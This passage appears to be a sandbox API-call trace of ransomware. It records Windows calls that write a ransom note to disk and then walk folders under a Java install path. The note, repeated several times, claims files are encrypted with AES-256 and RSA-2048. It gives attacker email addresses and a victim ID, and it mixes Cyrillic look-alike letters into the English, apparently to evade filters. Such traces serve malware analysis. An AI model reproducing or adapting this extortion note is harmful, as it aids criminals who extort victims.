te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0136.017] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e943a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n;Ò\x9d¹t\x1fÎ[.ÈæÖ\x09\x8cUYѸ0Þ¿\x9e£\x8d¥R\x17ö×", lpUsedDefaultChar=0x0) returned 7247 [0136.017] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0136.018] CloseHandle (hObject=0x1f0) returned 1 [0136.019] Sleep (dwMilliseconds=0x3e8) [0139.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\", cchCount2=40) returned 3 [0139.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\", cchCount1=40, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount2=47) returned 1 [0139.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount2=47) returned 1 [0139.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount2=48) returned 1 [0139.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount2=48) returned 1 [0139.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount2=48) returned 1 [0139.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount2=48) returned 1 [0139.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount2=48) returned 2 [0139.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount2=48) returned 1 [0139.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files 